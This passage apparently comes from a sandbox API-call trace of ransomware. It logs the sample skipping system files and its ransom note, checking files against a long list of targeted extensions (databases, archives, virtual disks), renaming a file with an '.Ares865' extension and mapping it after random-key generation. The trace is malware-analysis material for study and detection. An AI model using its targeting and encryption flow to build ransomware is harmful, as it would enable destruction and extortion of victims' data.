lstrlenW (lpString="wdb") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.886] lstrlenW (lpString="wmdb") returned 4 [0087.886] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.886] lstrlenW (lpString="wrk") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.886] lstrlenW (lpString="xdb") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.886] lstrlenW (lpString="xld") returned 3 [0087.886] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.886] lstrlenW (lpString="xmlff") returned 5 [0087.886] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.886] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.Ares865") returned 79 [0087.886] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.889] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.889] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45920) returned 1 [0087.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.889] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.890] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.890] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.890] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb660, lpName=0x0) returned 0x15c [0087.893] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb660) returned 0x190000 [0087.906] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.908] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.908] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.911] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.911] CloseHandle (hObject=0x15c) returned 1 [0087.911] CloseHandle (hObject=0x118) returned 1 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="..") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="windows") returned -1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="temp") returned -1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="boot") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0087.912] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0087.912] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned 71 [0087.912] lstrcpyW (in: lpString1=0x2cce468, lpString2="ONINTL.DLL.trx_dll" | out: lpString1="ONINTL.DLL.trx_dll") returned="ONINTL.DLL.trx_dll" [0087.912] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0087.912] lstrlenW (lpString="Ares865") returned 7 [0087.912] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.912] lstrlenW (lpString=".dll") returned 4 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0087.912] lstrlenW (lpString=".lnk") returned 4 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.912] lstrlenW (lpString=".ini") returned 4 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0087.912] lstrlenW (lpString=".sys") returned 4 [0087.912] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0087.912] lstrlenW (lpString="ONINTL.DLL.trx_dll") returned 18 [0087.912] lstrlenW (lpString="bak") returned 3 [0087.912] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.913] lstrlenW (lpString="ba_") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.913] lstrlenW (lpString="dbb") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.913] lstrlenW (lpString="vmdk") returned 4 [0087.913] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.913] lstrlenW (lpString="rar") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.913] lstrlenW (lpString="zip") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.913] lstrlenW (lpString="tgz") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.913] lstrlenW (lpString="vbox") returned 4 [0087.913] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.913] lstrlenW (lpString="vdi") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.913] lstrlenW (lpString="vhd") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.913] lstrlenW (lpString="vhdx") returned 4 [0087.913] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.913] lstrlenW (lpString="avhd") returned 4 [0087.913] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.913] lstrlenW (lpString="db") returned 2 [0087.913] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.913] lstrlenW (lpString="db2") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.913] lstrlenW (lpString="db3") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.913] lstrlenW (lpString="dbf") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.913] lstrlenW (lpString="mdf") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.913] lstrlenW (lpString="mdb") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.913] lstrlenW (lpString="sql") returned 3 [0087.913] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.913] lstrlenW (lpString="sqlite") returned 6 [0087.913] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.913] lstrlenW (lpString="sqlite3") returned 7 [0087.914] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.914] lstrlenW (lpString="sqlitedb") returned 8 [0087.914] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.914] lstrlenW (lpString="xml") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.914] lstrlenW (lpString="$er") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.914] lstrlenW (lpString="4dd") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.914] lstrlenW (lpString="4dl") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.914] lstrlenW (lpString="^^^") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.914] lstrlenW (lpString="abs") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.914] lstrlenW (lpString="abx") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.914] lstrlenW (lpString="accdb") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.914] lstrlenW (lpString="accdc") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.914] lstrlenW (lpString="accde") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.914] lstrlenW (lpString="accdr") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.914] lstrlenW (lpString="accdt") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.914] lstrlenW (lpString="accdw") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.914] lstrlenW (lpString="accft") returned 5 [0087.914] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.914] lstrlenW (lpString="adb") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.914] lstrlenW (lpString="adb") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.914] lstrlenW (lpString="ade") returned 3 [0087.914] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.914] lstrlenW (lpString="adf") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.915] lstrlenW (lpString="adn") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.915] lstrlenW (lpString="adp") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.915] lstrlenW (lpString="alf") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.915] lstrlenW (lpString="ask") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.915] lstrlenW (lpString="btr") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.915] lstrlenW (lpString="cat") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.915] lstrlenW (lpString="cdb") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.915] lstrlenW (lpString="ckp") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.915] lstrlenW (lpString="cma") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.915] lstrlenW (lpString="cpd") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.915] lstrlenW (lpString="dacpac") returned 6 [0087.915] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.915] lstrlenW (lpString="dad") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.915] lstrlenW (lpString="dadiagrams") returned 10 [0087.915] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.915] lstrlenW (lpString="daschema") returned 8 [0087.915] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.915] lstrlenW (lpString="db-journal") returned 10 [0087.915] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.915] lstrlenW (lpString="db-shm") returned 6 [0087.915] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.915] lstrlenW (lpString="db-wal") returned 6 [0087.915] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.915] lstrlenW (lpString="dbc") returned 3 [0087.915] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.915] lstrlenW (lpString="dbs") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.916] lstrlenW (lpString="dbt") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.916] lstrlenW (lpString="dbv") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.916] lstrlenW (lpString="dbx") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.916] lstrlenW (lpString="dcb") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.916] lstrlenW (lpString="dct") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.916] lstrlenW (lpString="dcx") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.916] lstrlenW (lpString="ddl") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.916] lstrlenW (lpString="dlis") returned 4 [0087.916] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.916] lstrlenW (lpString="dp1") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.916] lstrlenW (lpString="dqy") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.916] lstrlenW (lpString="dsk") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.916] lstrlenW (lpString="dsn") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.916] lstrlenW (lpString="dtsx") returned 4 [0087.916] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.916] lstrlenW (lpString="dxl") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.916] lstrlenW (lpString="eco") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.916] lstrlenW (lpString="ecx") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.916] lstrlenW (lpString="edb") returned 3 [0087.916] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.916] lstrlenW (lpString="epim") returned 4 [0087.916] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.916] lstrlenW (lpString="fcd") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.917] lstrlenW (lpString="fdb") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.917] lstrlenW (lpString="fic") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.917] lstrlenW (lpString="flexolibrary") returned 12 [0087.917] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.917] lstrlenW (lpString="fm5") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.917] lstrlenW (lpString="fmp") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.917] lstrlenW (lpString="fmp12") returned 5 [0087.917] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.917] lstrlenW (lpString="fmpsl") returned 5 [0087.917] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.917] lstrlenW (lpString="fol") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.917] lstrlenW (lpString="fp3") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.917] lstrlenW (lpString="fp4") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.917] lstrlenW (lpString="fp5") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.917] lstrlenW (lpString="fp7") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.917] lstrlenW (lpString="fpt") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.917] lstrlenW (lpString="frm") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.917] lstrlenW (lpString="gdb") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.917] lstrlenW (lpString="gdb") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.917] lstrlenW (lpString="grdb") returned 4 [0087.917] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.917] lstrlenW (lpString="gwi") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.917] lstrlenW (lpString="hdb") returned 3 [0087.917] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.918] lstrlenW (lpString="his") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.918] lstrlenW (lpString="ib") returned 2 [0087.918] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.918] lstrlenW (lpString="idb") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.918] lstrlenW (lpString="ihx") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.918] lstrlenW (lpString="itdb") returned 4 [0087.918] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.918] lstrlenW (lpString="itw") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.918] lstrlenW (lpString="jet") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.918] lstrlenW (lpString="jtx") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.918] lstrlenW (lpString="kdb") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.918] lstrlenW (lpString="kexi") returned 4 [0087.918] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.918] lstrlenW (lpString="kexic") returned 5 [0087.918] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.918] lstrlenW (lpString="kexis") returned 5 [0087.918] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.918] lstrlenW (lpString="lgc") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.918] lstrlenW (lpString="lwx") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.918] lstrlenW (lpString="maf") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.918] lstrlenW (lpString="maq") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.918] lstrlenW (lpString="mar") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.918] lstrlenW (lpString="marshal") returned 7 [0087.918] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.918] lstrlenW (lpString="mas") returned 3 [0087.918] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.919] lstrlenW (lpString="mav") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.919] lstrlenW (lpString="maw") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.919] lstrlenW (lpString="mdbhtml") returned 7 [0087.919] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.919] lstrlenW (lpString="mdn") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.919] lstrlenW (lpString="mdt") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.919] lstrlenW (lpString="mfd") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.919] lstrlenW (lpString="mpd") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.919] lstrlenW (lpString="mrg") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.919] lstrlenW (lpString="mud") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.919] lstrlenW (lpString="mwb") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.919] lstrlenW (lpString="myd") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.919] lstrlenW (lpString="ndf") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.919] lstrlenW (lpString="nnt") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.919] lstrlenW (lpString="nrmlib") returned 6 [0087.919] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.919] lstrlenW (lpString="ns2") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.919] lstrlenW (lpString="ns3") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.919] lstrlenW (lpString="ns4") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.919] lstrlenW (lpString="nsf") returned 3 [0087.919] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.919] lstrlenW (lpString="nv") returned 2 [0087.919] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.919] lstrlenW (lpString="nv2") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.920] lstrlenW (lpString="nwdb") returned 4 [0087.920] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.920] lstrlenW (lpString="nyf") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.920] lstrlenW (lpString="odb") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.920] lstrlenW (lpString="odb") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.920] lstrlenW (lpString="oqy") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.920] lstrlenW (lpString="ora") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.920] lstrlenW (lpString="orx") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.920] lstrlenW (lpString="owc") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.920] lstrlenW (lpString="p96") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.920] lstrlenW (lpString="p97") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.920] lstrlenW (lpString="pan") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.920] lstrlenW (lpString="pdb") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.920] lstrlenW (lpString="pdm") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.920] lstrlenW (lpString="pnz") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.920] lstrlenW (lpString="qry") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.920] lstrlenW (lpString="qvd") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.920] lstrlenW (lpString="rbf") returned 3 [0087.920] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.920] lstrlenW (lpString="rctd") returned 4 [0087.920] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.920] lstrlenW (lpString="rod") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.921] lstrlenW (lpString="rodx") returned 4 [0087.921] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.921] lstrlenW (lpString="rpd") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.921] lstrlenW (lpString="rsd") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.921] lstrlenW (lpString="sas7bdat") returned 8 [0087.921] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.921] lstrlenW (lpString="sbf") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.921] lstrlenW (lpString="scx") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.921] lstrlenW (lpString="sdb") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.921] lstrlenW (lpString="sdc") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.921] lstrlenW (lpString="sdf") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.921] lstrlenW (lpString="sis") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.921] lstrlenW (lpString="spq") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.921] lstrlenW (lpString="te") returned 2 [0087.921] lstrcmpiW (lpString1="ll", 